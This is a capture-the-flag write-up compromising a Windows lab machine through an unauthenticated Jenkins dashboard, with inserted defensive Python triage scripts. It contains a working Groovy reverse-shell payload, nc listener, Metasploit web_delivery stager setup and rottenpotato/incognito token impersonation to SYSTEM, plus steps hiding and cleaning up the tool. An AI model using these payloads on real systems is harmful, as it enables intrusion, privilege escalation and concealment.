Jeeves is a machine rated easy. It is compromised by exploiting the unauthenticated Jeeves (Jenkins) dashboard: a Java reverse shell is run in Jeeves' Script Console (where Groovy scripts can be run for troubleshooting), and a reverse connection comes back to my netcat listener.

Once the reverse connection is established, I moved to the user's desktop to get the user flag.

Checking the user's privileges, there is a SeImpersonatePrivilege, which is the condition needed for rottenpotato to elevate to "NT Authority\System".

The next step is privilege escalation with rottenpotato. rottenpotato works together with incognito, which is easy to load if the shell is a meterpreter; the video on how to do the rottenpotato attack can be found here.

After the root flag is obtained, the last thing is to exit meterpreter and clean up from another connection by deleting the uploaded rottenpotato. Before it can be deleted, it has to be killed forcefully with taskkill /F /PID <pid of rottenpotato>.


nmap -A -p- -oN jeeves -vvv

Increasing send delay for from 0 to 5 due to 61 out of 202 dropped probes since last increase.
Nmap scan report for
Host is up, received syn-ack (0.17s latency).
Scanned at 2020-05-02 21:58:07 +08 for 595s
Not shown: 65531 filtered ports
Reason: 65531 no-responses
80/tcp    open  http         syn-ack Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
445/tcp   open  microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         syn-ack Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 5h03m13s, deviation: 0s, median: 5h03m13s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 55172/tcp): CLEAN (Timeout)
|   Check 2 (port 48223/tcp): CLEAN (Timeout)
|   Check 3 (port 55682/udp): CLEAN (Timeout)
|   Check 4 (port 48293/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-02T19:10:36
|_  start_date: 2020-05-02T18:53:29

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May  2 22:08:02 2020 -- 1 IP address (1 host up) scanned in 595.85 seconds
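As an added example (not part of the original post): a small Python triage that parses nmap -oN output of the shape shown above and pulls out the findings a defender would fix on this host: the TRACE method left enabled on IIS, SMB signing disabled or not required, and Jetty on a non-standard port, which usually means a Jenkins instance whose login enforcement needs checking. The sample text is constructed from the scan above and trimmed to the lines the triage looks at.

```python
import re

# Constructed sample in the shape of the nmap -oN output above (trimmed to the
# lines the triage looks at); it is not a live scan.
SAMPLE_NMAP = """\
80/tcp    open  http         syn-ack Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
445/tcp   open  microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         syn-ack Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)

Host script results:
| smb-security-mode: 
|   authentication_level: user
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
"""

# port/proto  state  service  reason  version...
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap(text):
    """Split -oN output into per-port records and host-level script lines."""
    ports, host_scripts = {}, []
    current = None            # port whose NSE script lines follow
    in_host_section = False
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))
            ports[current] = {
                "proto": m.group(2), "state": m.group(3),
                "service": m.group(4), "version": m.group(6).strip(),
                "script": [],
            }
            continue
        if line.startswith("Host script results"):
            in_host_section, current = True, None
            continue
        if line.startswith("|"):
            cleaned = line.lstrip("|_ ").strip()
            if in_host_section:
                host_scripts.append(cleaned)
            elif current is not None:
                ports[current]["script"].append(cleaned)
    return ports, host_scripts


def triage(text):
    """Return the findings a defender should act on, in port order."""
    ports, host_scripts = parse_nmap(text)
    findings = []
    for port, info in sorted(ports.items()):
        tag = f"{port}/{info['proto']}"
        for s in info["script"]:
            if s.startswith("Potentially risky methods") and "TRACE" in s:
                findings.append(f"{tag}: HTTP TRACE enabled; disable it on IIS")
        if "Jetty" in info["version"]:
            findings.append(f"{tag}: Jetty on a non-standard port (often Jenkins); "
                            "confirm the dashboard and script console require login")
    for s in host_scripts:
        if s.startswith("message_signing: disabled"):
            findings.append("445/tcp: SMB1 message signing disabled; require signing")
        elif s == "Message signing enabled but not required":
            findings.append("445/tcp: SMB2 signing not required; require signing")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_NMAP):
        print(finding)
```

The parser keys on the fixed column layout of the port table and on the `|`/`|_` prefixes nmap uses for NSE output, so it works on any -oN file, not only this one; the finding rules are the ones relevant to this box and are easy to extend.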

Directory enumeration with gobuster on port 50000

gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -o web_enum

The result is /askjeeves (Status: 302)

Check the


Clicking on “Manage Jenkins” I found “Script Console”.

Reverse shell connection

I borrowed the Java reverse shell from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#java and changed the port and IP address.

// The Jenkins Script Console runs Groovy, which imports java.io.* and
// java.net.* by default, so no import lines are needed here.
// Listener address and port; the address was blanked in the original post.
String host = "";
int port = 1337;
String cmd = "cmd.exe";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
// Pump bytes between the process and the socket until either side goes away.
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();


Then, before running the script in the Jeeves script console, I set up an nc listener: nc -lvnp 1337


Get the user flag


User’s privilege

The user has SeImpersonatePrivilege, which can be exploited by rottenpotato.exe.
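As an added example (not part of the original post): the defender's side of this step is finding which service accounts hold the privileges that make this escalation possible before an attacker does. The Python below parses `whoami /priv` output and reports the held privileges that turn code execution as that account into SYSTEM-level access. The sample output is constructed to look like a build service account; the privilege set is illustrative.

```python
import re

# Constructed sample shaped like `whoami /priv` on a service account such as
# the one Jenkins runs under; the specific privilege set is illustrative.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that turn code execution as this account into SYSTEM-level access.
HIGH_RISK = {
    "SeImpersonatePrivilege": "token impersonation; the condition rottenpotato needs",
    "SeAssignPrimaryTokenPrivilege": "token assignment; same escalation family",
    "SeDebugPrivilege": "open any process, including SYSTEM ones",
    "SeBackupPrivilege": "read any file regardless of ACL",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# name  description...  Enabled|Disabled
PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Return {privilege_name: state} from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_RE.match(line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def risky_privileges(text):
    """Return [(name, state, impact)] for held high-risk privileges.

    The state is reported but not used as a filter: a privilege that is merely
    Disabled is still held by the token and the process can enable it itself,
    so only privileges absent from the list are truly unavailable."""
    privs = parse_privileges(text)
    return [(name, state, HIGH_RISK[name])
            for name, state in privs.items() if name in HIGH_RISK]


if __name__ == "__main__":
    for name, state, impact in risky_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{name} ({state}): {impact}")
```

The fix is on the account, not on the tool: run the build service under an account that does not hold these privileges (a dedicated low-privilege user or a virtual service account), and keep the script console behind authentication so code execution never reaches that account in the first place.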

Get meterpreter connection

I need incognito to execute rottenpotato in the background; the easiest way is to load incognito from meterpreter.

To get a meterpreter session I use exploit/multi/script/web_delivery to deliver the stager to Jeeves.


I used these settings for my exploit. Target 2 specifies PowerShell; the default payload is a Python script, so after setting target 2 I have to change the payload to payload/windows/meterpreter/reverse_tcp, which is compatible with PowerShell.

The Jeeves machine runs Windows 10 Pro, 64-bit, but I could not get the x64 reverse TCP payload delivered; the good old payload/windows/meterpreter/reverse_tcp was delivered instead.


I copy and paste the PowerShell payload into the nc session.


Privilege escalation

I had already downloaded rottenpotato, so I upload it to Jeeves. I have also loaded incognito; both load incognito and use incognito work.

By calling help, these are the incognito commands:

The current user has no tokens to impersonate, but after rottenpotato is executed, "NT Authority\System" will be available for impersonation.

The available options for execute are as follows:

execute -Hc -f /users/kohsuke/downloads/rottenpotato.exe: this executes rottenpotato hidden in the background and creates a channel for interacting with incognito.

Running list_tokens -u, I now have a token available to impersonate.

Run the incognito command impersonate_token "NT AUTHORITY\SYSTEM".

There is a small twist: hm.txt does not directly reveal the root flag.

I spawn a shell from meterpreter and run dir /R, which reveals whether any files have an alternate data stream.

Read the alternate stream content: more < hm.txt:root.txt
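As an added example (not part of the original post): alternate data streams are also a common hiding place for payloads, so the same dir /R listing is worth parsing as a hunting step. The Python below reads dir /R output, lists every stream, and separates out the ones that are not the expected Zone.Identifier mark-of-the-web. The listing is constructed to match the layout of dir /R; the file names besides hm.txt are illustrative.

```python
import re

# Constructed sample in the shape of `dir /R` output; apart from hm.txt the
# entries are illustrative and not copied from the machine.
SAMPLE_DIR_R = r"""
 Volume in drive C has no label.
 Volume Serial Number is 1A2B-3C4D

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 report.docx
                                    26 report.docx:Zone.Identifier:$DATA
               2 File(s)            833 bytes
               2 Dir(s)  2,432,651,264 bytes free
"""

# dir /R prints each alternate stream on its own indented line as
#   <size> <file>:<stream>:$DATA
ADS_RE = re.compile(r"^\s+(\d[\d,]*)\s+(.+?):([^:\\/]+):\$DATA\s*$")

# Zone.Identifier is the mark-of-the-web that browsers and mail clients add to
# downloads; it is expected and not worth alerting on.
BENIGN_STREAMS = {"Zone.Identifier"}


def parse_ads(text):
    """Return [(file_name, stream_name, size_bytes)] for every ADS listed."""
    streams = []
    for line in text.splitlines():
        m = ADS_RE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            streams.append((m.group(2), m.group(3), size))
    return streams


def suspicious_ads(text):
    """Streams worth a look: anything that is not a known benign stream."""
    return [s for s in parse_ads(text) if s[1] not in BENIGN_STREAMS]


if __name__ == "__main__":
    for file_name, stream, size in suspicious_ads(SAMPLE_DIR_R):
        print(f"{file_name}:{stream} ({size} bytes)")
```

On a live system the PowerShell equivalent is Get-Item with -Stream *, which returns the same stream names without having to parse text; the parser above is useful when all you have is a captured dir /R listing.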

Clean up

When I used tasklist /svc, rottenpotato was not displayed, which is intended due to the execute -H option.

